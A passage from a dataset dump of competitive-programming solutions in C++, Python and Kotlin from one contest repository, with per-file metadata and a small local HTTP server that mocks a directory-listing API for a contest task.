'\\n' : ' ');\n}\n\nint main()\n{\n // freopen(\"input.txt\", \"r\", stdin);\n int n, k;\n readln(n, k);\n for (int i = 0; i < n; i++)\n scanf(\"%d.%d.%d.%d\\n\", &a[i][0], &a[i][1], &a[i][2], &a[i][3]);\n int c = 0;\n int j = 0;\n ans[c] = pos[j];\n ans[1] = 0;\n ans[2] = 0;\n ans[3] = 0;\n set< pair< pair<int, int>, pair<int, int> > > se;\n while (true)\n {\n se.clear();\n for (int i = 0; i < n; i++)\n se.insert(make_pair(make_pair(a[i][0] & ans[0], a[i][1] & ans[1]),\n make_pair(a[i][2] & ans[2], a[i][3] & ans[3])));\n if (se.size() > k)\n {\n printf(\"-1\\n\");\n return 0;\n }\n if (se.size() == k)\n {\n printf(\"%d.%d.%d.%d\\n\", ans[0], ans[1], ans[2], ans[3]);\n return 0;\n }\n if (j == 7)\n c++,\n j = 0;\n ans[c] = pos[++j];\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.4360482692718506, "alphanum_fraction": 0.4502262473106384, "avg_line_length": 28.598215103149414, "blob_id": "fe4af1784ea0212e51a11daf7c9df4791525f6e1", "content_id": "22064dcdb98f8d2a5013d30cf338dc49b5df652b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6630, "license_type": "no_license", "max_line_length": 174, "num_lines": 224, "path": "/2022/yandexBackend/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n#include \"json.hpp\"\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//lca\nstruct lca\n{\n vector<vector<int>> g, up;\n vector<int> h;\n int n, l;\n\n lca(const vector<vector<int>>& g) //O(n * log(n))\n {\n this->g = g;\n n = SZ(g);\n l = 1;\n while ((1 << l) <= n) ++l;\n h.resize(n, -1);\n up.resize(l + 1, vector<int>(n));\n dfs(0, 0);\n fori(l)\n forj(n)\n up[i + 1][j] = up[i][up[i][j]];\n }\n \n int getParent(int u, int dist) { //O(log(n))\n fori(l)\n if (dist >> i & 1)\n u = up[i][u];\n return u;\n }\n\n void dfs(int u, int p) //O(n)\n {\n h[u] = h[p] + 1;\n up[0][u] = p;\n for (const int& v: g[u])\n if (v != p)\n dfs(v, u);\n }\n\n int get(int a, int b) //O(log(n))\n {\n if (h[a] < h[b]) swap(a, b);\n a = getParent(a, h[a] - h[b]);\n if (a == b) return a;\n ROF(i, l, 0)\n if (up[i][a] != up[i][b])\n a = up[i][a],\n b = up[i][b];\n return up[0][a];\n }\n\n int getChildWithVertex(int a, int b) //O(log(n))\n {\n if (a == b) return -1;\n return getParent(b, h[b] - h[a] - 1);\n }\n};\n\n//}}}\n\nusing json = nlohmann::json;\n\nvector<string>split(string&s,string_view d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\n\nstatic const int N = 100005;\nvoid run()\n{\n json j;\n cin >> j;\n vector<vector<int>> g(N);\n vector<map<string, int>> f(N), b(N);\n vector<bool> isChild(N);\n vector<string> labelString(N);\n vector<int> labelInt(N);\n vector<bool> label(N);\n int V = 0;\n vector<int> children;\n auto dfs = [&](auto dfs, json& u, int root) -> void {\n for (const auto& v: u.items())\n {\n g[root].pb(++V);\n f[root][v.key()] = V;\n b[V][v.key()] = root;\n if (v.value().is_object())\n dfs(dfs, v.value(), V);\n else if (!v.value().is_null())\n {\n isChild[V] = true;\n children.pb(V);\n if (v.value().is_string())\n labelString[V] = v.value();\n else\n labelInt[V] = v.value(),\n label[V] = true;\n }\n }\n };\n dfs(dfs, j, 
V);\n lca l(g);\n ints(q);\n fori(q)\n {\n json r;\n cin >> r;\n string p = r[\"path\"];\n int cnt = r[\"count\"];\n vector<int> ans;\n vector<string> ans2;\n\n auto x = split(p, \"*\");\n int root = 0;\n bool ok = true;\n for (auto& s: split(x[0], \".\"))\n if (s.size() && ok)\n {\n if (f[root].find(s) != f[root].end())\n root = f[root][s];\n else\n ok = false;\n }\n if (ok)\n {\n auto ss = split(x[1], \".\");\n reverse(all(ss));\n for (int C: children)\n {\n bool ok = true;\n int child = C;\n for (string& s: ss)\n if (s.size() && ok)\n {\n if (b[child].find(s) != b[child].end())\n child = b[child][s];\n else\n ok = false;\n }\n if (ok && child)\n {\n child = b[child][b[child].begin()->first];\n if (l.get(root, child) == root)\n {\n if (label[C])\n ans.pb(labelInt[C]);\n else\n ans2.pb(labelString[C]);\n }\n }\n }\n }\n sort(all(ans));\n sort(all(ans2));\n reverse(all(ans));\n reverse(all(ans2));\n json answer;\n if (ans.size() && ans2.size())\n writeln(\"{\\\"result\\\":null}\");\n else\n {\n ans.resize(min(cnt, SZ(ans)));\n ans2.resize(min(cnt, SZ(ans2)));\n if (ans.size())\n answer[\"result\"] = ans;\n else\n answer[\"result\"] = ans2;\n cout << answer << \"\\n\";\n }\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false); cin.tie(0);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti 
istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.6842105388641357, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 18, "blob_id": "a3d6367da9d23927193e2f325e8ac84707719fc9", "content_id": "bd3c35534a0279e276e5fb5a86019a98f94afec4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19, "license_type": "no_license", "max_line_length": 18, "num_lines": 1, "path": "/CodeForce/1663/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "print('Red panda')\n" }, { "alpha_fraction": 0.5803201794624329, "alphanum_fraction": 0.5877725481987, "avg_line_length": 31.348215103149414, "blob_id": "f2f10b018701f39b3482454bc4f2e425ed79e299", "content_id": "19ce270279fe99a7ba62920645bb120f40932de2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7326, "license_type": "no_license", "max_line_length": 107, "num_lines": 224, "path": "/2021/yandexBackendFinal/server.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\nimport http.server as hs\nimport json\nimport sys\nimport urllib.parse\n\nclass RecordType:\n Folder = 'Folder'\n Record = 'Record'\n\n\nclass Record:\n def __init__(self, record_type, name):\n assert record_type in [RecordType.Folder, RecordType.Record]\n self.type = record_type\n self.name = name\n self.size = 1\n\n def to_dict(self):\n return {'type': self.type, 'name': self.name, 'size': self.size}\n\n\nclass Tree:\n def __init__(self, nodes_count):\n # Из индекса вершины в:\n self.graph: List[List[int]] = [[] for _ in range(nodes_count)] # В индекс ребёнка\n self.record: List[Record] = [Record(RecordType.Folder, '') for _ in range(nodes_count)] # В данные\n self.path: List[str] = ['' for _ in range(nodes_count)] # В путь\n 
self.depth: List[int] = [1 for _ in range(nodes_count)] # В глубину\n\n self.record[0] = Record(RecordType.Folder, '')\n self.current_ind: int = 1\n self.path_ind: Dict[str, int] = {'/': 0} # Из пути переходит в индекс вершины\n\n def add_edge(self, parent_path, child, child_type):\n parent_ind = self.path_ind[parent_path]\n self.graph[parent_ind].append(self.current_ind)\n self.record[self.current_ind] = Record(child_type, child)\n\n parent_folder = self.path[parent_ind]\n self.path[self.current_ind] = parent_folder + '/' + child\n self.path_ind[self.path[self.current_ind]] = self.current_ind\n\n self.current_ind += 1\n\n def calculate_sizes(self):\n for node in range(len(self.graph)):\n self.record[node].size = len(self.graph[node])\n for child_node in self.graph[node]:\n self.depth[child_node] = self.depth[node] + 1\n\n def validate_path(self, path):\n return path in self.path_ind\n\n def ls(self, node_ind):\n return [self.record[ind] for ind in self.graph[node_ind]]\n\n\nclass Listing:\n def __init__(self, records):\n self.records = records\n\n def to_dict(self):\n return [record.to_dict() for record in self.records]\n\n\nclass LsBatchResponse:\n def __init__(self, listings):\n self.listings = listings\n\n def to_dict(self):\n return {'listings': [listing.to_dict() for listing in self.listings]}\n\ndef is_valid_ls_batch_request(json_str):\n try:\n json_request = json.loads(json_str)\n if not isinstance(json_request, dict):\n return False\n if 'paths' not in json_request.keys():\n return False\n paths = json_request['paths']\n if not isinstance(paths, list):\n return False\n for path in paths:\n if not isinstance(path, str):\n return False\n except (TypeError, json.JSONDecodeError):\n return False\n return True\n\n\ndef read_input(file_input):\n \"\"\"\n n max_batch_size\n parent_ind name type <- (n - 1) times\n \"\"\"\n login = file_input.readline().strip()\n n, max_batch_size = map(int, file_input.readline().split())\n\n tree = Tree(n)\n for _ in range(n - 
1):\n path = file_input.readline().strip()\n\n child_type = RecordType.Record\n if path[-1] == '/':\n child_type = RecordType.Folder\n path = path[:-1]\n\n path_tokens = path.split('/')\n parent_path, child_name = '/'.join(path_tokens[:-1]), path_tokens[-1]\n if parent_path == '':\n parent_path = '/'\n\n tree.add_edge(parent_path, child_name, child_type)\n tree.calculate_sizes()\n\n return login, max_batch_size, tree\n\nOK = 200\nWRONG_REQUEST = 400\nBATCH_SIZE_TOO_BIG = 429\n\nclass State:\n def __init__(self, login, max_batch_size, tree):\n self.start = False\n self.queries_left = 0\n self.login = login\n self.max_batch_size = max_batch_size\n self.tree = tree\n\nclass ServerHTTPHandler(hs.BaseHTTPRequestHandler):\n path_start_session = '/start/session?'\n path_ls_batch = '/ls/batch'\n\n def send_answer(self, code, content):\n self.send_response(code)\n self.end_headers()\n self.wfile.write(content.encode('utf-8'))\n\n def start_session(self, query):\n try:\n params = urllib.parse.parse_qs(query)\n except:\n self.send_answer(WRONG_REQUEST, 'Invalid login')\n return\n if params is None:\n self.send_answer(WRONG_REQUEST, 'Invalid login')\n return\n login = params.get('login', [])\n if len(login) != 1 or login[0] != self.state.login:\n self.send_answer(WRONG_REQUEST, 'Invalid login')\n return\n if self.state.queries_left == 0:\n self.send_answer(BATCH_SIZE_TOO_BIG, 'Amount of queries is exceeded')\n return\n self.state.queries_left -= 1\n self.state.start = True\n self.send_answer(OK, json.dumps({'max_batch_size': self.state.max_batch_size}))\n\n def ls_batch(self):\n if self.state.queries_left == 0:\n self.send_answer(BATCH_SIZE_TOO_BIG, 'Amount of queries is exceeded')\n return\n self.state.queries_left -= 1\n\n if not self.state.start:\n self.send_answer(WRONG_REQUEST, 'Session is not started')\n return\n try:\n length = int(self.headers['content-length'])\n except:\n self.send_answer(WRONG_REQUEST, 'Invalid content length')\n request = self.rfile.read(length)\n 
if not is_valid_ls_batch_request(request):\n self.send_answer(WRONG_REQUEST, '/ls/batch request is invalid')\n return\n\n batch = json.loads(request)['paths']\n\n total_size = 0\n ind_to_process = []\n for path in batch:\n if self.state.tree.validate_path(path):\n ind_to_process.append(self.state.tree.path_ind[path])\n total_size += self.state.tree.record[ind_to_process[-1]].size\n else:\n self.send_answer(WRONG_REQUEST, 'One of paths in batch is invalid')\n return\n if total_size > self.state.max_batch_size:\n self.send_answer(BATCH_SIZE_TOO_BIG, 'Size of a batch is bigger than max_batch_size')\n return\n\n self.send_answer(OK, json.dumps(LsBatchResponse([\n Listing([self.state.tree.record[ind] for ind in self.state.tree.graph[parent_ind]])\n for parent_ind in ind_to_process\n ]).to_dict()))\n\n def do_GET(self):\n if self.path.startswith(self.path_start_session):\n self.start_session(self.path[len(self.path_start_session):])\n else:\n self.send_error(404)\n\n def do_POST(self):\n if self.path == self.path_ls_batch or self.path.startswith(self.path_ls_batch + \"?\"):\n self.ls_batch()\n else:\n self.send_error(404)\n\n\ndef run(argv):\n login, max_batch_size, tree = read_input(open(argv[1])) # input\n state = State(login, max_batch_size, tree)\n state.queries_left = 1 + max(1, max(\n tree.depth[i] if tree.record[i].size > 0 else 0\n for i in range(len(tree.graph))))\n ServerHTTPHandler.state = state\n\n server = hs.HTTPServer(('127.0.0.1', 7777), ServerHTTPHandler)\n server.serve_forever()\n\n\nif __name__ == '__main__':\n run(sys.argv)\n" }, { "alpha_fraction": 0.35062241554260254, "alphanum_fraction": 0.3623789846897125, "avg_line_length": 22.704917907714844, "blob_id": "ee3b6103f9fbafdeb50f8d30372e9006a6cea996", "content_id": "eaefbeea4264af8fde7c3f7ffbf3fe42b59418b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2892, "license_type": "no_license", "max_line_length": 103, "num_lines": 122, "path": 
"/2019/yandexBackend/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\nimport time\n\ndef is_op(c):\n return c == '+' or c == '-' or c == '*' or c == '/' or c == '<' or c == '>' or c == '=' or c == '?'\n\nK = int(input())\n\nS = input().split(' ')\nI = 0\nA = []\n\ndef push(x):\n global I\n global A\n A[I] = x\n I += 1\n\ndef pop():\n global I\n global A\n I -= 1\n return A[I]\n\ndef process_op(op):\n if len(op) == 0: return\n c = op[0]\n if len(op) == 1 and is_op(c):\n r = pop()\n l = pop()\n R = str(r)\n L = str(l)\n if type(l) == int and type(r) == int:\n if c == '+': push(l + r)\n if c == '-': push(l - r)\n if c == '*': push(l * r)\n if c == '/': push(0 if r == 0 else l // r)\n if c == '<': push(l < r)\n if c == '=': push(l == r)\n if c == '?':\n cmp = pop()\n if type(cmp) == bool:\n push(l if cmp else r)\n else:\n push(cmp); push(l); push(r); push('?')\n else:\n if c == '+': push(l); push(r); push('+')\n if c == '-': push(l); push(r); push('-')\n if c == '*':\n if l == 0 or r == 0:\n push(0)\n else:\n push(l); push(r); push('*')\n if c == '/': push(l); push(r); push('/')\n if c == '<': push(l); push(r); push('<')\n if c == '=': push(l); push(r); push('=')\n if c == '?':\n cmp = pop()\n if type(cmp) == bool:\n push(l if cmp else r)\n else:\n push(cmp); push(l); push(r); push('?')\n\n elif len(op) == 1 and ord(c) >= ord('a') and ord(c) <= ord('z'):\n push(op)\n else:\n push(int(op))\n\n\nA = [0] * 10 ** 5\nfor ss in S:\n process_op(ss)\n\ns = list(map(str, A[:I]))\n# print(' '.join(s))\n\ni = 0\na = []\n\ndef push(x):\n global i\n global a\n a[i] = x\n i += 1\n\ndef pop():\n global i\n global a\n i -= 1\n return a[i]\n\ndef process_op2(alpabet, op):\n if len(op) == 0: return\n c = op[0]\n if len(op) == 1 and is_op(c):\n r = pop()\n l = pop()\n if c == '+': push(l + r)\n if c == '-': push(l - r)\n if c == '*': push(l * r)\n if c == '/': push(0 if r == 0 else l // r)\n if c == '<': push(l < r)\n if c == '=': push(l == r)\n if c == 
'?':\n cmp = pop()\n push(l if cmp else r)\n elif len(op) == 1 and ord(c) >= ord('a') and ord(c) <= ord('z'):\n push(alphabet[ord(c) - ord('a')])\n elif len(op) == 1 and ord(c) >= ord('A') and ord(c) <= ord('Z'):\n push(alphabet[ord(c) - ord('A')])\n else:\n push(int(op))\n\n\nn = int(input())\nfor ___ in range(n):\n alphabet = list(map(int, input().split()))\n a = [0] * 10 ** 5\n i = 0\n for ss in s:\n process_op2(alphabet, ss)\n print(a[0])\n" }, { "alpha_fraction": 0.34410691261291504, "alphanum_fraction": 0.36233294010162354, "avg_line_length": 29.036497116088867, "blob_id": "7b61f6f793d2225124d18665df43fbbe0f8e2e19", "content_id": "42c0a5aa900306369d98511358e695ff0a16bd1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4115, "license_type": "no_license", "max_line_length": 928, "num_lines": 137, "path": "/2013/2013GCJ/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void 
readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nchar ans[4][30] = {\"Draw\", \"X won\", \"O won\", \"Game has not completed\"};\nint field[4][4];\n\nint test()\n{\n char c;\n bool f = false;\n for (int i = 0; i < 4; i++, scanf(\"%c\", &c))\n for (int j = 0; j < 4; j++)\n {\n scanf(\"%c\", &c);\n switch (c)\n {\n case 'X' :\n field[i][j] = 1;\n break;\n case 'O' :\n field[i][j] = 2;\n break;\n case 'T' :\n field[i][j] = 3;\n break;\n default :\n field[i][j] = 0;\n f = true;\n break;\n }\n }\n scanf(\"%c\", &c);\n int j, k;\n bool ff;\n for (int i = 0; i < 4; i++)\n {\n ff = false;\n for (j = 0, k = field[i][0] == 3 ? field[i][1] : field[i][0]; j < 4; j++)\n {\n if (field[i][j] == 3)\n continue;\n if (field[i][j] != k || !field[i][j])\n {\n ff = true;\n break;\n }\n }\n if (!ff)\n return k;\n }\n for (int i = 0; i < 4; i++)\n {\n ff = false;\n for (j = 0, k = field[0][i] == 3 ? field[1][i] : field[0][i]; j < 4; j++)\n {\n if (field[j][i] == 3)\n continue;\n if (field[j][i] != k || !field[j][i])\n {\n ff = true;\n break;\n }\n }\n if (!ff)\n return k;\n }\n ff = false;\n for (j = 0, k = field[0][0] == 3 ? field[1][1] : field[0][0]; j < 4; j++)\n {\n if (field[j][j] == 3)\n continue;\n if (field[j][j] != k || !field[j][j])\n {\n ff = true;\n break;\n }\n }\n if (!ff)\n return k;\n\n ff = false;\n for (j = 0, k = field[0][3 - 0] == 3 ? field[1][3 - 1] : field[0][3 - 0]; j < 4; j++)\n {\n if (field[j][3 - j] == 3)\n continue;\n if (field[j][3 - j] != k || !field[j][3 - j])\n {\n ff = true;\n break;\n }\n }\n if (!ff)\n return k;\n\n return f ? 
3 : 0;\n}\n\nint main()\n{\n freopen(\"input.in\", \"r\", stdin);\n freopen(\"output.txt\", \"w+\", stdout);\n int T;\n readln(T);\n for (int tttt = 0; tttt < T; tttt++)\n {\n printf(\"Case #%d: \", tttt + 1);\n printf(\"%s\\n\", ans[test()]);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.41329580545425415, "alphanum_fraction": 0.4277172088623047, "avg_line_length": 27.43000030517578, "blob_id": "0833625217c42e736c6720f8aa0bfd4f527af794", "content_id": "eb6d952fa5ad32590caf978cc0aa0a98914103ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2843, "license_type": "no_license", "max_line_length": 928, "num_lines": 100, "path": "/CodeForce/0292/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nint a[100002];\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &a, int 
n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n a.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n // freopen(\"input.txt\", \"r\", stdin);\n//freopen(\"output.txt\", \"w+\", stdout);\n int n, t, c, m, x, y;\n readln(n, m);\n bool f = true;\n int pos = 0;\n for (int i = 0; i < m; i++)\n {\n readln(x, y);\n a[x]++;\n a[y]++;\n if (a[x] > 2)\n if (pos == x || pos == 0)\n pos = x; else\n {\n f = false;\n break;\n }\n if (a[y] > 2)\n if (pos == y || pos == 0)\n pos = y; else\n {\n f = false;\n break;\n }\n }\n if (!f)\n {\n printf(\"unknown topology\\n\");\n return 0;\n }\n if (pos != 0)\n if (a[pos] == n - 1)\n {\n bool d = false;\n for (int j = 1; j <= n; j++)\n if (j == pos)\n continue; else\n if (a[j] != 1)\n {\n d = true;\n break;\n }\n if (d)\n printf(\"unknown topology\\n\"); else\n printf(\"star topology\\n\");\n return 0;\n }\n int count = 0;\n int s = 0;\n for (int i = 1; i <= n; i++)\n if (a[i] == 2)\n count++; else\n if (a[i] == 1)\n s++;\n if (count == n)\n {\n printf(\"ring topology\\n\");\n return 0;\n }\n if (count == n - 2 && s == 2)\n {\n printf(\"bus topology\\n\");\n return 0;\n }\n printf(\"unknown topology\\n\");\n return 0;\n}\n" }, { "alpha_fraction": 0.3632538616657257, "alphanum_fraction": 0.3913043439388275, "avg_line_length": 18.2702693939209, "blob_id": "a408364fc5850ce6b5109c53ff437f6611c9e717", "content_id": "6d1c45ff93e39f0ac949bcae5ed254336758e27d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 713, "license_type": "no_license", "max_line_length": 38, "num_lines": 37, "path": "/2020/bguirQual/O.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\nimport math\n\nn = int(input())\na = list(map(int, input().split()))\ns = sum(a)\nif s % n != 0:\n print('Impossible')\n sys.exit()\n\nm = s // n\ng = sum((x - 
m) ** 2 for x in a)\nif g % n != 0:\n print('Impossible')\n sys.exit()\n\ng //= n\nfor (i, x) in enumerate(a):\n X = x - m\n K = g + X ** 2\n D = s + X\n c = m ** 2 + D ** 2 - K\n b = 2 * (m + D)\n d = b ** 2 - 8 * c\n if d < 0: continue\n sk = max(0, int(math.sqrt(d)) - 1)\n while sk ** 2 < d: sk += 1\n if sk ** 2 == d:\n a = 2 * (m + D) + sk\n if a % 4 == 0:\n a //= 4\n b = s + x - a\n print('Possible')\n print(i + 1, a, b)\n sys.exit()\n\nprint('Impossible')\n" }, { "alpha_fraction": 0.4803706705570221, "alphanum_fraction": 0.49267059564590454, "avg_line_length": 26.604650497436523, "blob_id": "0728f82a3d02533e174c8f1fcc475d71e9560840", "content_id": "71878f33475d75a1f224925402724f7591c43c89", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 5935, "license_type": "no_license", "max_line_length": 118, "num_lines": 215, "path": "/CodeForce/1570/H.kt", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.PrintWriter// {{{\nimport java.util.*\nimport kotlin.collections.*// }}}\n\nconst val MOD = 998244353\n\nclass Modular(var value: Int) {\n init {\n if ((value > MOD) or (value < -MOD))\n value %= MOD\n if (value < 0)\n value += MOD\n }\n\n constructor(other: Modular): this(other.value) {}\n\n constructor(num: Int, den: Int) : this(0) {\n var xor = Modular(den).xor(MOD - 2)\n xor *= Modular(num)\n value = xor.value\n }\n\n fun xor(deg: Int): Modular {\n var copy = Modular(value)\n var a = Modular(this.value)\n var n = deg - 1\n while (n > 0) {\n if ((n and 1) == 1)\n copy *= a\n a *= a\n n = n shr 1\n }\n return copy\n }\n\n operator fun div(t: Int): Modular = Modular(value) * Modular(t).inverse()\n operator fun plus(t: Int): Modular = Modular(value + t)\n operator fun minus(t: Int): Modular = Modular(value - t)\n operator fun times(t: Int): Modular = Modular(((value * 1L * t) % MOD).toInt())\n\n operator fun div(t: Modular): Modular = Modular(value) * t.inverse()\n operator fun 
plus(t: Modular): Modular = Modular(value + t.value)\n operator fun minus(t: Modular): Modular = Modular(value - t.value)\n operator fun times(t: Modular): Modular = Modular(((value * 1L * t.value) % MOD).toInt())\n\n fun inverse(): Modular {\n return Modular(1, value)\n }\n\n override fun equals(other: Any?): Boolean = if (other is Modular)\n value == other.value\n else\n false\n\n override fun hashCode(): Int {\n return value\n }\n\n override fun toString(): String {\n return value.toString()\n }\n}\n\nclass Matrix(var n: Int, var value: Array<IntArray>) {\n fun inc(i: Int, j: Int) {\n value[i][j]++\n }\n\n constructor(n: Int): this(n, Array(n) { IntArray(n) {0} }) {\n }\n\n fun xor(deg: Int): Matrix {\n var copy = Matrix(n, value)\n var a = Matrix(n, value)\n var n = deg - 1\n while (n > 0) {\n if ((n and 1) == 1)\n copy *= a\n a *= a\n n = n shr 1\n }\n return copy\n }\n\n operator fun times(other: Matrix): Matrix {\n val ret = Matrix(n)\n for (i in 0 until n)\n for (j in 0 until n)\n for (k in 0 until n)\n ret.value[i][j] = (ret.value[i][j] + ((value[i][k] * 1L * other.value[k][j]) % MOD).toInt()) % MOD\n return ret\n }\n}\n\nclass Trie {\n var array: ArrayList<IntArray> = arrayListOf(IntArray(26) {-1})\n var term: ArrayList<Boolean> = arrayListOf(false)\n\n operator fun plus(s: String): Trie {\n var root = 0\n for (c in s) {\n val u = c.toInt() - 'a'.toInt()\n if (array[root][u] == -1) {\n array[root][u] = array.size\n array.add(IntArray(26) {-1})\n term.add(false)\n }\n root = array[root][u]\n }\n term[root] = true\n return this\n }\n\n}\n\nprivate fun run() {\n val (n, m) = readln()\n val ss = Array(n) { readLine()!! 
